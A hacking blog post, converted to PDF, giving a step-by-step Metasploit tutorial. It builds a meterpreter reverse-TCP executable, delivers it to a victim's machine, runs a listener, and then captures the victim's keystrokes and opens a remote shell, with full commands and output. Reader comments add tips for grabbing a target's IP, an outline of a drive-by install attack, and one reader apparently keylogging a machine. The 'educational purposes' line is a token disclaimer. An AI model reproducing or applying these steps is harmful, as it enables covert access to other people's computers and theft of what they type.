Explore Hacking

the dark side of technology

home about us privacy policy disclaimer articles write for us

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

Posted by Aneesh M. Makker at 5:40 AM / Categories: metasploit /

Get articles in your inbox

Enter your email address: Subscribe Do not forget to click on the link sent in INBOX to verify subscription

Search any topic

Search

Categories
Anonymity

email

email spoofing fake email

fake login page google Hacking Website

--- The Metasploit Framework --Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.
open in browser PRO version
Are you a developer? Try out the HTML to PDF API

malicious metasploit phishing proxies RAT Spywares trojan

hiding IP keyloggers

viruses

Website

website

vulnerabilitis windows XSS

Translate Page

pdfcrowd.com

Translate Page
If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years. Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you hav e just a few security loopholes which may arise cause of
ev en a simple reason like not updating y our Flash play er last week, when it prompted y ou to do so. Metasploit is a hacker's best friend, mainly cause it makes the job of ex ploitation and postex ploitation a lot easier compared to other traditional methods of hacking. The topic Metasploit is v ery v ast in itself.Howev er, i'll try keeping it basic and simple so that it could be understood by ev ery one here. Also, Metasp loit can be used with several other Select Language
Pow ered by

Translate

Connect With us on Facebook

Facebook Public Profile
Login to see this content

tools such as NMap or Nessus (all these tools are present in Backtrack ). In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.
Hacking through Metasploit is done in 3 simple steps : Point , Click, 0wn .

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them) Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage. Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target. Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes. Payload: Actual code which runs on the compromised system after exploitation Now, what Metasploit IS? It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.
open in browser PRO version
Are you a developer? Try out the HTML to PDF API

Popular Posts
Metasploit Tutorial - With an example | Exploiting the vulnerabilities Setting Backdoor in Windows | Command Prompt On Logon Screen Phishing - Creating,uploading and using fake login pages

pdfcrowd.com

SQL Injection | Step by Step deface website

METASPLOIT ANTI FORENSICS: Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify. Metasploit comes in the following versions: 1. CLI (Command Line Interface) 2. Web Interface 3. MSF Console 4. MSFwx 5. MSFAPI I would recommend using the MSF Console because of its effectiveness & powerful from a pentesters P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously. I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool. For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester. Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk. Let the Hacking Begin : Open up backtrack. You should have a screen similar to this.

Trojan Horse | RAT | Configure and Use | Tutorial- Part 2 Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming Google Dorks | Using Google efficiently Desktop Phishing - Step by step tutorial SQL INJECTION | Website Deface | Using tool | Live Example Remote Keylogger - configure and use

Do Not Copy Articles

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

The default login credentials are:

Username: root Pass: toor Type in root@bt:~#/etc/init.d/wicd start to start the wicd manager Finally, type "startx" to start the GUI mode: root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in: root@bt:~#ifconfig It would be something like 192.168.x.x or 10.x.x.x. Have a note of it. Now, Launch msfconsole by going to Applications>>Backtrack >>Metasploit Engineering Framework >>Framework Version 3>>msfconsole

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

You should now be having a shell something similar to a command prompt in windows.

msf > Lets now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (Session>>New Shell or click on the small icon on the left of the shell tab in the bottom left corner of the window)

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=your local ip LPORT=any port you wish x > /root/reverse_tcp.exe Your local IP is the one you noted earlier and for port you could select 4444. (Everything has to be entered without quotes) You should get something like this: Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=192.168.255.130,LPORT=4444 root@bt:/opt/metasploit3/msf3# Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1st shell window with msfconsole in it. msf > Type the following: msf > use exploit/multi/handler

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130 LHOST => 192.168.255.130 msf exploit(handler) > set LPORT 4444 LPORT => 4444

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

All the connections are done. You have already made an executable file which makes a reverse connection to you. And now, you have set the meterpreter to listen to you on port 4444. The last step you have to do now, is to type in exploit and press enter, msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444 [*] Starting the payload handler... Now, the payload is listening for all the incoming connections on port 444. [*] Sending stage (749056 bytes) to 192.168.255.1 [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

You would see a meterpreter prompt like this meterpreter >

Type in ps to list the active processes

meterpreter > ps

Search for explorer.exe and migrate to the process meterpreter > migrate 5716 [*] Migrating to 5716... [*] Migration completed successfully. meterpreter >

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Type in the following: meterpreter > use priv Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victims computer, Jus type shell meterpreter > shell Process 5428 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
open in browser PRO version
Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

You would now be having a command prompt, Type in whoami, to see the computers name of victim : C:\Windows\system32>whoami whoami win7-pc\win 7 C:\Windows\system32>

Lets suppose you want to start a notepad on the victims computer. Type in: Lets say the victim has typed in anything on his computer.
open in browser PRO version
Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Just type exit, to return to meterpreter. Now type in keyscan_dump, to see all the typed keystrokes : meterpreter > keyscan_dump Dumping captured keystrokes...

GaM3 0V3R P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

About Author : This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include Privacy Issues online, Web Application Security and Wireless Hacking. You can connect with him on facebook here.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

46 comments:
Anonymous Posted at: March 16, 2011 6:25 AM

Post a Comment

this looks complicated but interesting...:)

Anonymous Posted at: March 16, 2011 6:27 AM

nice one!

Priyanshu Posted at: March 16, 2011 6:32 AM

Nice POst Bro Keep It Up...!!

qwerty Posted at: March 16, 2011 9:31 AM

what do u mean by the 2 versions vmware and ISo? m running kubuntu 10.10..can i install it? which would u suggest?

Saiprasad Posted at: March 17, 2011 10:31 PM

I was beating around this topic from weeks. this was very very helpful thakns yar. keep on posting!

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Saiprasad Posted at: March 17, 2011 10:35 PM

hey u have kept on telling what to do but how much time will it need for newbie to be able to start exploiting himself?

Aneesh M. Makker Posted at: March 17, 2011 11:47 PM

Thanks everybody. @qwerty vmware is a virtualization software. You can run multiple operating systems on a same machine. You dont need the dual booting. You can use Backtrack on your current operating system using backtrack vmware image. ISO image is meant to be burned on a disk and you can install it. Use this if you dont want to run backtrack on your current os @Saiprasad You need to explore a lot. It requires a lot of time..

Anonymous Posted at: March 18, 2011 11:20 AM

Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking fourms? Such as hackforums.net.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Aneesh M. Makker Posted at: March 20, 2011 2:16 PM

Yeah, Sometimes

Ashu Posted at: April 25, 2011 8:32 AM

Thanks for awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get the IP Address of target system?

Adi Posted at: May 1, 2011 3:33 AM

Yes, it would work over the Internet too. To get the IP, one thing you can do, is to use an IP logger PHP Script, host it on a free webhost, and ask the user to visit that link. It may sound little complicated, but trust me, its really simple. Good Luck!

Maverick Posted at: June 1, 2011 11:48 AM

Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!

Anonymous Posted at: June 9, 2011 11:22 AM

i have question so i can pay for this too !

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

esa_65@hotmail.fi hereis my msn

Adi Posted at: June 17, 2011 4:54 AM

The metasploit unleashed is a good place for a newbie to start. Here's the link

cy60rg4sm Posted at: July 8, 2011 3:00 AM

nice post bro.. keep it up.. but i want to know that is there any change if codes for backtack 5????

roy Posted at: July 12, 2011 8:16 PM

This one is done in a vm , but how to carry out this in real world situation, should i first port forward or dmz my vm (bt ) machine then use my local ip or my external ip . could u please share some light on this doing this in real world situation

How to Become a Computer Hacker Posted at: July 27, 2011 6:48 PM

Metasploit seems insanely complicated, thanks for making it that little bit more clearer! This can be applied to servers, its insane how insecure things are!

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Anonymous Posted at: August 14, 2011 4:34 AM

Friends feel free to copy the articles by asking to admin as these articles are also been taken from various other websites. . .

Anonymous Posted at: August 15, 2011 2:10 AM

How can i copy the .exe file in2 a thumb drive in BT4...???

Anonymous Posted at: August 29, 2011 9:21 AM

Great Job Bro

pavan kumar Posted at: September 10, 2011 2:33 PM

am using metasploit 3.7 version n this procedure is not working out :( what do i do ??

Hii Posted at: September 22, 2011 5:35 AM

hi frndz help me plz its all going well & i got a session also but some problem like [*] Started reverse handler on 192.168.255.130:4444

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

[*] Starting the payload handler... Now, the payload is listening for all the incoming connections on port 444. [*] Sending stage (749056 bytes) to 192.168.255.1 [*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011 dats it... its not going more,,, when i type session -l its show command not found... plz helppppp

Anonymous Posted at: October 15, 2011 12:45 PM

Great job ! Bdw, backtrack is complex thing - why u didn't write installation procedure ? dual boot ? windows 7 ? USB backtrack usage ?Ubuntu ? kindly, tell me about it !!!!! Thanks in advance sami

Abhishek Posted at: November 4, 2011 2:47 AM

anyone want to learn hacking or how to use metaspolit command in unix. mail me or can chat with me at abhishek.jalan84@gmail.com

Sandeep Posted at: November 24, 2011 2:52 AM

Is this above all possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Almas Malik Posted at: December 7, 2011 8:37 AM

Nice Informative Post!! Bloggers needed for Hacking Exposed [almashackingtutorials.blogspot.com] If interested mail me at almas.malik101@gmail.com

Anonymous Posted at: December 17, 2011 9:32 AM

well. i am kinda new to metasploit. I can understand most of it but i have a question. why do we have to copy the payload file? Cant we inject it to the target?

Feor hc Posted at: January 3, 2012 10:59 PM

nice articles, keep it up bro

Anonymous Posted at: February 10, 2012 11:20 AM

Very Nice Article : Can you Post some windows 7 ultimate , basic version exploit ... xD thanks ..

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Anonymous Posted at: February 14, 2012 6:49 AM

Will this method works on public network ?

Anonymous Posted at: February 17, 2012 8:57 PM

nice one, but explain in backtrack 5

Anonymous Posted at: February 21, 2012 3:52 AM

you all are fools except two, one me and the second one is the owner of this web page !!

Anonymous Posted at: February 21, 2012 10:03 PM

excellent article.. very kewl,, Its truly appreciated

ztobs Posted at: February 25, 2012 7:06 AM

i av bt5 live cd, buh im finding it difficult to configure my hsdpa modem with it. i also have ubuntu 10.6 dual boot with windows, ive successfully configured my modem with it ubuntu. how can i copy the exploiting softwares from the bt5 livecd to the ubuntu os, Ill really appreciate ur gud response.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Anonymous Posted at: February 26, 2012 11:52 AM

I get an error- metasploit 3 directory doesnt exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.

premkumar Posted at: March 14, 2012 10:46 PM

it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

premkumar Posted at: March 14, 2012 10:47 PM

it's all about your hardwork and some knowledge, if you try to get in someone's pc, it takes 100 try and only one you might get success...in short..lots of...A LOT...work required. Do you understand now?, in short, 99 % chances are of only failure.

Anonymous Posted at: March 19, 2012 5:43 PM

This won't work for real, are poeple really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you. 99% of the time the machines on the net are behind firewalls which means requirement one is out! 99% of the time the machines on the net are behind firewalls which means requirement two is out!

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden tasktray icon. I wrote a self installing VNC ver, with no tray or installer, it self installed w a preset pass. If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server 2) Build the exact reverse of this example with Meta, so that the exe connects to you when ran, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an activeX control, or if your not that good, make it a Click Once... 3) Get a VPS anonymously and setup the listener, setup a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections. 4) put the Signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there. 5) Sit on your VPS, or a hacked one, and wait... Thats a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exe's, look at the older apps... new ones are sha1.. Thats right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CA's... No way at all. Windoz Suckz. 3dge3lite

Anonymous Posted at: March 25, 2012 1:15 AM

can bactrack use to get computer information from ISP server, if we have ip public of ISP ? thanks for help, freehotspot2340@yahoo.co.id

Steven van Stiphout Posted at: March 28, 2012 12:04 AM

very nice tutorial, and clearly intended for pen testing purposes as well. People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a good trick usually. But if you know how it works it's usually just a few simple steps and a show that fits

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entrypoint gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vurnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!

SS Posted at: March 30, 2012 2:21 AM

I cannot migrate to the winlogon.exe process. It says: Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges) How can I get around that? The machine I'm attacking is running windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).

chatur Posted at: April 9, 2012 3:37 AM

surfing with proxy websites and IP spoofing are same techniques ? if not, why proxy websites are construct ? if any hacker use proxy website for cyber crime, will he/she not be traced ?????? hope that you'll reply me !!!!

chatur Posted at: April 9, 2012 4:39 AM

is there any difference b/w these 2 queries in BT root@bt: and root@root: when I work root@bt: all konsole functions work but in root@root it doesnt work.. even I coudnt find

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

metasploit frmework in root@root... how to fix this problem ???? plz help me.

Anonymous Posted at: April 11, 2012 4:31 AM

Ok now author I'm using a windows7 on my laptop and I head that there is some dual os or something like that is it possible for me to have both the Linux and the windows on the same laptop if this is possible how can I go about doing it.Please mail me to: mymcsi.mymcsiworld@gmail.com

Anonymous Posted at: April 11, 2012 10:50 AM

This isn't explointing a vulnerability.

jaydipsinh Posted at: April 12, 2012 3:27 AM

such a nice post... gr8 :))

Post a Comment

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com

Enter your comment...

Comment as: Select profile... Publish Preview

Subscribe to: Post Comments (Atom)

Home-Next

Copyright 2010. Explore Hacking all rights reserved.

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

pdfcrowd.com